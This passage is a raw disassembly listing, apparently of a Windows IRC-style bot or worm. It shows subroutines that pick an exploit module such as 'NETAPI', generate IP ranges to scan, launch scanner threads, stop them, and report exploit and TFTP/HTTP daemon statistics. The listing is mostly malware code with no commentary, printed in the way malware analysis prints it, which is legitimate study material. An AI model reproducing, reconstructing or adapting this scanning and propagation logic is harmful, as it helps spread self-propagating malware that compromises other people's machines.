		lea	ecx, [eax+1]

loc_402409:				; CODE XREF: sub_402385+89j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402409
		push	dword ptr [esi+8]
		sub	eax, ecx
		mov	[ebp+eax-124h],	dl
		call	sub_404376
		push	dword ptr [esi+0Ch]
		mov	[ebp-18h], eax
		call	sub_404376
		push	dword ptr [esi+10h]
		mov	[ebp-20h], eax
		call	sub_404376
		push	dword ptr [esi+14h]
		mov	[ebp-1Ch], eax
		call	sub_404376
		mov	[ebp-24h], eax
		mov	al, [ebp+0Ch]
		add	esp, 10h
		cmp	dword ptr [ebp-20h], 0FFDCh
		mov	[ebp-14h], al
		jg	short loc_40249C
		push	8
		call	sub_4035D9
		pop	ecx
		mov	[ebp-228h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_40249C
		push	offset sub_41C2A3
		lea	ecx, [ebp-224h]
		mov	edi, offset dword_421E88
		mov	esi, eax
		call	sub_414D0E
		jmp	short loc_40249C
; ---------------------------------------------------------------------------

loc_402486:				; CODE XREF: sub_402385+19j
		push	offset aUdpInsufficien ; "UDP: Insufficient Arguments."
		push	edi
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h

loc_40249C:				; CODE XREF: sub_402385+D0j
					; sub_402385+E6j ...
		call	sub_404C3F
		retn	1Ch
sub_402385	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4024A4	proc near		; DATA XREF: zcrshv4o:off_422000o
		push	60h
		mov	eax, offset loc_41CEAC
		call	sub_404BF5
		mov	eax, [ebp+18h]
		mov	[ebp-68h], eax
		xor	eax, eax
		mov	byte ptr [ebp-30h], 0
		lea	edi, [ebp-2Fh]
		stosd
		stosd
		stosd
		mov	ebx, [ebp+20h]
		stosw
		and	dword ptr [ebp-58h], 0
		and	dword ptr [ebp-48h], 0
		stosb
		xor	eax, eax
		mov	byte ptr [ebp-20h], 0
		lea	edi, [ebp-1Fh]
		stosd
		stosd
		stosd
		stosw
		stosb
		or	edi, 0FFFFFFFFh
		cmp	byte_437B3D, 0
		mov	[ebp-50h], ebx
		mov	byte ptr [ebp-41h], 0
		mov	[ebp-5Ch], edi
		mov	[ebp-60h], edi
		mov	[ebp-64h], edi
		mov	[ebp-6Ch], edi
		jnz	short loc_40250B
		call	sub_41C0F3
		test	al, al
		jz	loc_4029BA

loc_40250B:				; CODE XREF: sub_4024A4+58j
		cmp	byte_4293D4, 0
		jnz	short loc_402521
		call	sub_419997
		test	al, al
		jz	loc_4029BA

loc_402521:				; CODE XREF: sub_4024A4+6Ej
		and	dword ptr [ebp-54h], 0
		mov	ecx, offset aNetapi ; "NETAPI"
		mov	eax, ecx
		lea	esi, [eax+1]

loc_40252F:				; CODE XREF: sub_4024A4+90j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40252F
		jmp	short loc_40257E
; ---------------------------------------------------------------------------

loc_402538:				; CODE XREF: sub_4024A4+DCj
		mov	edx, [ebx+4]
		mov	eax, ecx

loc_40253D:				; CODE XREF: sub_4024A4+B1j
		mov	cl, [eax]
		cmp	cl, [edx]
		jnz	short loc_40255B
		test	cl, cl
		jz	short loc_402557
		mov	cl, [eax+1]
		cmp	cl, [edx+1]
		jnz	short loc_40255B
		inc	eax
		inc	eax
		inc	edx
		inc	edx
		test	cl, cl
		jnz	short loc_40253D

loc_402557:				; CODE XREF: sub_4024A4+A1j
		xor	eax, eax
		jmp	short loc_40255F
; ---------------------------------------------------------------------------

loc_40255B:				; CODE XREF: sub_4024A4+9Dj
					; sub_4024A4+A9j
		sbb	eax, eax
		sbb	eax, edi

loc_40255F:				; CODE XREF: sub_4024A4+B5j
		test	eax, eax
		jz	short loc_402584
		inc	dword ptr [ebp-54h]
		mov	ecx, [ebp-54h]
		imul	ecx, 2Ch
		lea	ecx, aNetapi[ecx] ; "NETAPI"
		mov	eax, ecx
		lea	esi, [eax+1]

loc_402577:				; CODE XREF: sub_4024A4+D8j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402577

loc_40257E:				; CODE XREF: sub_4024A4+92j
		sub	eax, esi
		jnz	short loc_402538
		jmp	short loc_402589
; ---------------------------------------------------------------------------

loc_402584:				; CODE XREF: sub_4024A4+BDj
		cmp	[ebp-54h], edi
		jnz	short loc_4025A6

loc_402589:				; CODE XREF: sub_4024A4+DEj
		push	offset aScanUnknownExp ; "Scan:	Unknown	Exploit."
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 10h
		jmp	loc_4029BA
; ---------------------------------------------------------------------------

loc_4025A6:				; CODE XREF: sub_4024A4+E3j
		mov	esi, [ebx+8]
		mov	eax, esi
		mov	ecx, offset a____0 ; "*.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jz	short loc_4025CB
		push	dword ptr [ebx+0Ch]
		mov	byte ptr [ebp-41h], 1
		call	sub_404376
		pop	ecx
		mov	[ebp-4Ch], eax
		jmp	short loc_402628
; ---------------------------------------------------------------------------

loc_4025CB:				; CODE XREF: sub_4024A4+113j
		push	esi
		call	sub_404376
		pop	ecx
		push	3
		pop	edx
		cmp	[ebp+1Ch], edx
		mov	[ebp-4Ch], eax
		mov	[ebp-48h], edx
		jl	short loc_402621
		mov	eax, edx

loc_4025E2:				; CODE XREF: sub_4024A4+17Bj
		mov	ecx, [ebp-50h]
		mov	eax, [ecx+eax*4]
		mov	edi, eax
		mov	esi, offset aA	; "-a"
		mov	ecx, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_40266F
		mov	edi, eax
		mov	esi, offset aB	; "-b"
		mov	ecx, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_402621
		mov	edi, eax
		mov	esi, offset aC	; "-c"
		mov	ecx, edx
		xor	eax, eax
		repe cmpsb
		jz	short loc_402675
		inc	dword ptr [ebp-48h]
		movzx	eax, word ptr [ebp-48h]
		cmp	eax, [ebp+1Ch]
		jle	short loc_4025E2

loc_402621:				; CODE XREF: sub_4024A4+13Aj
					; sub_4024A4+160j
		mov	dword ptr [ebp-48h], 1

loc_402628:				; CODE XREF: sub_4024A4+125j
					; sub_4024A4+1CFj ...
		xor	eax, eax

loc_40262A:				; CODE XREF: sub_4024A4+19Cj
		cmp	byte_429829[eax], 0
		jz	short loc_402636
		inc	dword ptr [ebp-58h]

loc_402636:				; CODE XREF: sub_4024A4+18Dj
		add	eax, 124h
		cmp	eax, 0E420h
		jbe	short loc_40262A
		mov	ecx, [ebp-58h]
		mov	eax, 0C8h
		sub	eax, ecx
		cmp	eax, [ebp-4Ch]
		jnb	short loc_40267E
		push	eax
		push	offset aScanNotEnoughT ; "Scan:	Not Enough Threads. %d Available."...
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 14h
		jmp	loc_4029BA
; ---------------------------------------------------------------------------

loc_40266F:				; CODE XREF: sub_4024A4+151j
		and	dword ptr [ebp-48h], 0
		jmp	short loc_402628
; ---------------------------------------------------------------------------

loc_402675:				; CODE XREF: sub_4024A4+16Fj
		mov	dword ptr [ebp-48h], 2
		jmp	short loc_402628
; ---------------------------------------------------------------------------

loc_40267E:				; CODE XREF: sub_4024A4+1ABj
		add	[ebp-4Ch], ecx
		cmp	byte ptr [ebp-41h], 0
		jz	loc_4027A5
		mov	eax, [ebp-50h]
		push	dword ptr [eax+8]
		lea	eax, [ebp-30h]
		push	offset dword_421BF8
		push	0Fh
		pop	ebx
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp-30h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4026AC:				; CODE XREF: sub_4024A4+20Dj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4026AC
		sub	eax, ecx
		mov	[ebp+eax-30h], dl
		lea	eax, [ebp-6Ch]
		push	eax
		lea	eax, [ebp-64h]
		push	eax
		lea	eax, [ebp-60h]
		push	eax
		lea	eax, [ebp-5Ch]
		push	eax
		lea	eax, [ebp-30h]
		push	offset aD_D_D_D	; "%d.%d.%d.%d"
		push	eax
		call	sub_403B72
		add	esp, 18h
		cmp	dword ptr [ebp-5Ch], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_4026F4
		push	offset aX_	; "x."
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 0Ch
		jmp	short loc_402706
; ---------------------------------------------------------------------------

loc_4026F4:				; CODE XREF: sub_4024A4+23Dj
		push	dword ptr [ebp-5Ch]
		push	offset aD_	; "%d."
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h

loc_402706:				; CODE XREF: sub_4024A4+24Ej
		cmp	dword ptr [ebp-60h], 0FFFFFFFFh
		mov	esi, offset aSD_ ; "%s%d."
		mov	edi, offset aSx_ ; "%sx."
		lea	eax, [ebp-20h]
		jnz	short loc_402727
		push	eax
		push	edi
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_402739
; ---------------------------------------------------------------------------

loc_402727:				; CODE XREF: sub_4024A4+273j
		push	dword ptr [ebp-60h]
		push	eax
		push	esi
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 14h

loc_402739:				; CODE XREF: sub_4024A4+281j
		cmp	dword ptr [ebp-64h], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_402750
		push	eax
		push	edi
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_402762
; ---------------------------------------------------------------------------

loc_402750:				; CODE XREF: sub_4024A4+29Cj
		push	dword ptr [ebp-64h]
		push	eax
		push	esi
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 14h

loc_402762:				; CODE XREF: sub_4024A4+2AAj
		cmp	dword ptr [ebp-6Ch], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_40277D
		push	eax
		push	offset aSx	; "%sx"
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_402793
; ---------------------------------------------------------------------------

loc_40277D:				; CODE XREF: sub_4024A4+2C5j
		push	dword ptr [ebp-6Ch]
		push	eax
		push	offset aSD	; "%s%d"
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 14h

loc_402793:				; CODE XREF: sub_4024A4+2D7j
		lea	eax, [ebp-20h]
		lea	edx, [eax+1]

loc_402799:				; CODE XREF: sub_4024A4+2FAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_402799
		jmp	loc_40287E
; ---------------------------------------------------------------------------

loc_4027A5:				; CODE XREF: sub_4024A4+1E1j
		push	dword_4294DC
		mov	byte ptr [ebp-40h], 0
		xor	eax, eax
		lea	edi, [ebp-3Fh]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp-40h]
		stosb
		call	sub_419C46
		xor	eax, eax
		lea	edi, [ebp-30h]
		stosd
		stosd
		stosd
		stosd
		mov	eax, esi
		push	eax
		push	offset dword_421BF8
		push	0Fh
		pop	esi
		lea	eax, [ebp-30h]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-30h]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_4027E9:				; CODE XREF: sub_4024A4+34Aj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4027E9
		sub	eax, ecx
		mov	[ebp+eax-30h], dl
		lea	eax, [ebp-6Ch]
		push	eax
		lea	eax, [ebp-64h]
		push	eax
		lea	eax, [ebp-60h]
		push	eax
		lea	eax, [ebp-5Ch]
		push	eax
		lea	eax, [ebp-30h]
		push	offset aD_D_D_D	; "%d.%d.%d.%d"
		push	eax
		call	sub_403B72
		mov	eax, [ebp-48h]
		add	esp, 18h
		sub	eax, 0
		jz	short loc_40285C
		dec	eax
		jz	short loc_402842
		dec	eax
		jnz	short loc_402871
		push	dword ptr [ebp-64h]
		lea	eax, [ebp-20h]
		push	dword ptr [ebp-60h]
		push	dword ptr [ebp-5Ch]
		push	offset aD_D_D_x	; "%d.%d.%d.x"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 18h
		jmp	short loc_402871
; ---------------------------------------------------------------------------

loc_402842:				; CODE XREF: sub_4024A4+37Cj
		push	dword ptr [ebp-60h]
		lea	eax, [ebp-20h]
		push	dword ptr [ebp-5Ch]
		push	offset aD_D_x_x	; "%d.%d.x.x"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 14h
		jmp	short loc_402871
; ---------------------------------------------------------------------------

loc_40285C:				; CODE XREF: sub_4024A4+379j
		push	dword ptr [ebp-5Ch]
		lea	eax, [ebp-20h]
		push	offset aD_x_x_x	; "%d.x.x.x"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 10h

loc_402871:				; CODE XREF: sub_4024A4+37Fj
					; sub_4024A4+39Cj ...
		lea	eax, [ebp-20h]
		lea	edx, [eax+1]

loc_402877:				; CODE XREF: sub_4024A4+3D8j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_402877

loc_40287E:				; CODE XREF: sub_4024A4+2FCj
		sub	eax, edx
		cmp	byte ptr [ebp-41h], 0
		mov	byte ptr [ebp+eax-20h],	0
		mov	eax, [ebp-50h]
		jz	short loc_402893
		push	dword ptr [eax+0Ch]
		jmp	short loc_402896
; ---------------------------------------------------------------------------

loc_402893:				; CODE XREF: sub_4024A4+3E8j
		push	dword ptr [eax+8]

loc_402896:				; CODE XREF: sub_4024A4+3EDj
		call	sub_404376
		push	eax
		mov	eax, [ebp-54h]
		imul	eax, 2Ch
		push	dword_425548[eax]
		lea	eax, [ebp-20h]
		push	eax
		push	offset aScanSDUsingDTh ; "Scan:	%s:%d Using %d Threads."
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 20h
		call	sub_419F7B
		mov	ecx, [ebp-4Ch]
		cmp	[ebp-58h], ecx
		jnb	loc_4029BA
		mov	eax, [ebp-58h]
		imul	eax, 124h
		sub	ecx, [ebp-58h]
		mov	[ebp-50h], eax
		mov	[ebp-4Ch], ecx
		mov	esi, eax

loc_4028E9:				; CODE XREF: sub_4024A4+510j
		push	124h
		lea	ebx, dword_429818[esi]
		lea	edi, [ebx-100h]
		push	0
		push	edi
		call	sub_408130
		lea	eax, [ebp-30h]
		push	eax
		push	offset dword_421BF8
		push	0Fh
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_40291B:				; CODE XREF: sub_4024A4+47Cj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40291B
		push	dword ptr [ebp-68h]
		sub	eax, ecx
		mov	byte ptr dword_429818[esi+eax],	dl
		mov	al, [ebp-41h]
		push	offset dword_421BF8
		mov	[ebx+12h], al
		mov	eax, [ebp-48h]
		push	0FFh
		push	edi
		mov	[ebx+18h], eax
		call	sub_40307C
		mov	eax, edi
		add	esp, 10h
		lea	ecx, [eax+1]

loc_402952:				; CODE XREF: sub_4024A4+4B3j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402952
		sub	eax, ecx
		mov	byte_429718[esi+eax], dl
		mov	al, [ebp+0Ch]
		mov	[ebx+10h], al
		mov	eax, [ebp-54h]
		push	8
		mov	byte ptr [ebx+11h], 1
		mov	[ebx+14h], eax
		call	sub_4035D9
		pop	ecx
		mov	[ebp-58h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_40299D
		mov	ecx, edi
		push	offset sub_413FED
		mov	edi, offset aScanner ; "Scanner"
		mov	esi, eax
		call	sub_414D0E
		mov	esi, [ebp-50h]
		jmp	short loc_40299F
; ---------------------------------------------------------------------------

loc_40299D:				; CODE XREF: sub_4024A4+4DFj
		xor	eax, eax

loc_40299F:				; CODE XREF: sub_4024A4+4F7j
		or	dword ptr [ebp-4], 0FFFFFFFFh
		mov	eax, [eax]
		add	esi, 124h
		dec	dword ptr [ebp-4Ch]
		mov	[ebx+20h], eax
		mov	[ebp-50h], esi
		jnz	loc_4028E9

loc_4029BA:				; CODE XREF: sub_4024A4+61j
					; sub_4024A4+77j ...
		call	sub_404C3F
		retn	1Ch
sub_4024A4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 1Ch
		and	dword ptr [esp], 0
		push	ebx
		push	esi
		mov	ebx, offset dword_437E48
		push	edi
		mov	[esp+18h], ebx

loc_4029DB:				; CODE XREF: .text:00402A45j
					; .text:00402A62j ...
		mov	eax, dword_437E4C
		mov	eax, [eax]
		mov	[esp+14h], eax
		mov	[esp+10h], ebx

loc_4029EA:				; CODE XREF: .text:00402A29j
		mov	eax, dword_437E4C
		lea	edi, [esp+18h]
		lea	esi, [esp+10h]
		mov	[esp+1Ch], eax
		call	sub_40169D
		test	al, al
		jz	short loc_402A7D
		mov	edi, offset aScanner ; "Scanner"
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	8
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [esp+10h]
		jz	short loc_402A2B
		lea	edi, [esp+20h]
		call	sub_40166F
		jmp	short loc_4029EA
; ---------------------------------------------------------------------------

loc_402A2B:				; CODE XREF: .text:00402A1Ej
		call	sub_40164F
		mov	edi, [eax+40h]
		lea	esi, [esp+10h]
		call	sub_40164F
		mov	eax, [eax]
		call	sub_414C86
		test	al, al
		jz	short loc_4029DB
		xor	eax, eax
		xor	ecx, ecx

loc_402A4B:				; CODE XREF: .text:00402A60j
		cmp	dword_429838[ecx], edi
		jz	short loc_402A67
		add	ecx, 124h
		inc	eax
		cmp	ecx, 0E420h
		jbe	short loc_402A4B
		jmp	loc_4029DB
; ---------------------------------------------------------------------------

loc_402A67:				; CODE XREF: .text:00402A51j
		inc	dword ptr [esp+0Ch]
		imul	eax, 124h
		mov	byte_429829[eax], 0
		jmp	loc_4029DB
; ---------------------------------------------------------------------------

loc_402A7D:				; CODE XREF: .text:00402A02j
		push	dword ptr [esp+0Ch]
		push	offset aScanAllScanThr ; "Scan:	All Scan Threads Stopped. %d kill"...
		push	dword ptr [ebp+18h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 14h
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn	1Ch

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=188h


sub_402AA2	proc near		; DATA XREF: zcrshv4o:off_422010o

var_208		= dword	ptr -208h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		lea	ebp, [esp-188h]
		sub	esp, 208h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+188h+var_4], eax
		mov	eax, [ebp+188h+arg_10]
		push	esi
		push	edi
		mov	esi, 1FFh
		push	esi
		mov	[ebp+188h+var_208], eax
		lea	eax, [ebp+188h+var_203]
		push	0
		push	eax
		mov	[ebp+188h+var_204], 0
		call	sub_408130
		push	offset aStatisticsExpl ; "Statistics: Exploits:"
		lea	eax, [ebp+188h+var_204]
		push	esi
		push	eax
		xor	edi, edi
		call	sub_40307C
		add	esp, 18h
		xor	eax, eax

loc_402AF3:				; CODE XREF: sub_402AA2+7Ej
		push	dword_42554C[eax]
		lea	eax, aNetapi[eax] ; "NETAPI"
		push	eax
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSSD	; "%s %s: %d"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 18h
		inc	edi
		mov	eax, edi
		imul	eax, 2Ch
		cmp	dword_425548[eax], 0
		jnz	short loc_402AF3
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSDaemons ; "%s;	Daemons:"
		push	esi
		push	eax
		call	sub_40307C
		push	dword_437B44
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSTftpD	; "%s TFTP: %d"
		push	esi
		push	eax
		call	sub_40307C
		push	dword_437B38
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSHttpD	; "%s HTTP: %d"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 38h
		lea	eax, [ebp+188h+var_204]
		pop	edi
		lea	edx, [eax+1]
		pop	esi

loc_402B69:				; CODE XREF: sub_402AA2+CCj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_402B69
		sub	eax, edx
		mov	[ebp+eax+188h+var_204],	cl
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset dword_421BF8
		push	[ebp+188h+var_208]
		push	[ebp+188h+arg_4]
		push	offset dword_4294DC
		call	sub_417FE1
		mov	ecx, [ebp+188h+var_4]
		xor	ecx, ebp
		add	esp, 14h
		call	sub_402C9E
		add	ebp, 188h
		leave
		retn	1Ch
sub_402AA2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BAC	proc near		; CODE XREF: sub_41BB1E+A6p
		jmp	ds:dword_41E1D8
sub_402BAC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BB2	proc near		; CODE XREF: sub_41BB1E+149p
		jmp	ds:dword_41E1D4
sub_402BB2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BB8	proc near		; CODE XREF: sub_41BB1E+76p
					; sub_41BB1E+B9p ...
		jmp	ds:dword_41E1D0
sub_402BB8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BBE	proc near		; CODE XREF: sub_41BB1E+C8p
					; sub_41BB1E+1C0p ...
		jmp	ds:dword_41E1CC
sub_402BBE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BC4	proc near		; CODE XREF: sub_41BB1E+1B1p
		jmp	ds:dword_41E1C8
sub_402BC4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BCA	proc near		; CODE XREF: sub_41452B+88p
					; sub_41452B+C5p
		jmp	ds:dword_41E260
sub_402BCA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BD0	proc near		; CODE XREF: sub_41B3E7+B2p
		jmp	ds:dword_41E1C0
sub_402BD0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BD6	proc near		; CODE XREF: sub_401C1D+16p
					; sub_417C06+24p ...
		jmp	sub_4035D9
sub_402BD6	endp


; =============== S U B	R O U T	I N E =======================================



sub_402BDB	proc near		; DATA XREF: zcrshv4o:004227F4o
		mov	dword ptr [ecx], offset	off_41E358
		jmp	sub_40109A
sub_402BDB	endp

; ---------------------------------------------------------------------------

loc_402BE6:				; DATA XREF: zcrshv4o:off_41E358o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E358
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_402C02
		push	esi
		call	sub_4034FB
		pop	ecx

loc_402C02:				; CODE XREF: .text:00402BF9j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_402C08	proc near		; CODE XREF: sub_401337+Dp
		push	44h
		mov	eax, offset loc_41CD63
		call	sub_404B8C
		push	offset aStringTooLong ;	"string	too long"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_422ED8
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41E34C
		call	sub_40477B
		int	3		; Trap to Debugger
sub_402C08	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402C47	proc near		; CODE XREF: sub_401141+13p
					; sub_4012AC+Fp
		push	44h
		mov	eax, offset loc_41CD63
		call	sub_404B8C
		push	offset aInvalidStringP ; "invalid string position"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_4227F0
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41E358
		call	sub_40477B
		int	3		; Trap to Debugger
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_4013E6
		mov	dword ptr [esi], offset	off_41E358
		mov	eax, esi
		pop	esi
		retn	4
sub_402C47	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402C9E	proc near		; CODE XREF: sub_401DED+9Ap
					; sub_401E90+60p ...
		cmp	ecx, dword_424064
		jnz	short loc_402CA8
		rep retn
; ---------------------------------------------------------------------------

loc_402CA8:				; CODE XREF: sub_402C9E+6j
		jmp	sub_404C4E
sub_402C9E	endp


; =============== S U B	R O U T	I N E =======================================



sub_402CAD	proc near		; CODE XREF: sub_402D64+Dp
					; sub_402E87+1Ap ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		push	esi
		mov	esi, ecx
		mov	byte ptr [esi+0Ch], 0
		jnz	short loc_402D1F
		call	sub_40595D
		mov	[esi+8], eax
		mov	ecx, [eax+6Ch]
		mov	[esi], ecx
		mov	ecx, [eax+68h]
		mov	[esi+4], ecx
		mov	ecx, [esi]
		cmp	ecx, off_424678
		jz	short loc_402CEB
		mov	ecx, dword_424594
		test	[eax+70h], ecx
		jnz	short loc_402CEB
		call	sub_405671
		mov	[esi], eax

loc_402CEB:				; CODE XREF: sub_402CAD+2Aj
					; sub_402CAD+35j
		mov	eax, [esi+4]
		cmp	eax, dword_424498
		jz	short loc_402D0C
		mov	eax, [esi+8]
		mov	ecx, dword_424594
		test	[eax+70h], ecx
		jnz	short loc_402D0C
		call	sub_404F60
		mov	[esi+4], eax

loc_402D0C:				; CODE XREF: sub_402CAD+47j
					; sub_402CAD+55j
		mov	eax, [esi+8]
		test	byte ptr [eax+70h], 2
		jnz	short loc_402D29
		or	dword ptr [eax+70h], 2
		mov	byte ptr [esi+0Ch], 1
		jmp	short loc_402D29
; ---------------------------------------------------------------------------

loc_402D1F:				; CODE XREF: sub_402CAD+Dj
		mov	ecx, [eax]
		mov	[esi], ecx
		mov	eax, [eax+4]
		mov	[esi+4], eax

loc_402D29:				; CODE XREF: sub_402CAD+66j
					; sub_402CAD+70j
		mov	eax, esi
		pop	esi
		retn	4
sub_402CAD	endp


; =============== S U B	R O U T	I N E =======================================



sub_402D2F	proc near		; CODE XREF: sub_402D64+86p
					; sub_402E37+39j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi

loc_402D39:				; CODE XREF: sub_402D2F+2Ej
		movzx	eax, byte ptr [esi]
		lea	ecx, [eax-41h]
		inc	esi
		cmp	ecx, 19h
		ja	short loc_402D48
		add	eax, 20h

loc_402D48:				; CODE XREF: sub_402D2F+14j
		movzx	ecx, byte ptr [edx]
		lea	edi, [ecx-41h]
		inc	edx
		cmp	edi, 19h
		ja	short loc_402D57
		add	ecx, 20h

loc_402D57:				; CODE XREF: sub_402D2F+23j
		test	eax, eax
		jz	short loc_402D5F
		cmp	eax, ecx
		jz	short loc_402D39

loc_402D5F:				; CODE XREF: sub_402D2F+2Aj
		pop	edi
		sub	eax, ecx
		pop	esi
		retn
sub_402D2F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402D64	proc near		; CODE XREF: sub_402E37+45p
					; sub_40ED5A+8Fp

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		xor	ebx, ebx
		cmp	[ebp+arg_0], ebx
		jnz	short loc_402DAB
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402DA1
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402DA1:				; CODE XREF: sub_402D64+34j
		mov	eax, 7FFFFFFFh
		jmp	loc_402E34
; ---------------------------------------------------------------------------

loc_402DAB:				; CODE XREF: sub_402D64+17j
		push	edi
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		jnz	short loc_402DDE
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402DD7
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402DD7:				; CODE XREF: sub_402D64+6Aj
		mov	eax, 7FFFFFFFh
		jmp	short loc_402E33
; ---------------------------------------------------------------------------

loc_402DDE:				; CODE XREF: sub_402D64+4Dj
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_402DF3
		push	edi
		push	[ebp+arg_0]
		call	sub_402D2F
		pop	ecx
		pop	ecx
		jmp	short loc_402E27
; ---------------------------------------------------------------------------

loc_402DF3:				; CODE XREF: sub_402D64+80j
		push	esi

loc_402DF4:				; CODE XREF: sub_402D64+BCj
		mov	eax, [ebp+arg_0]
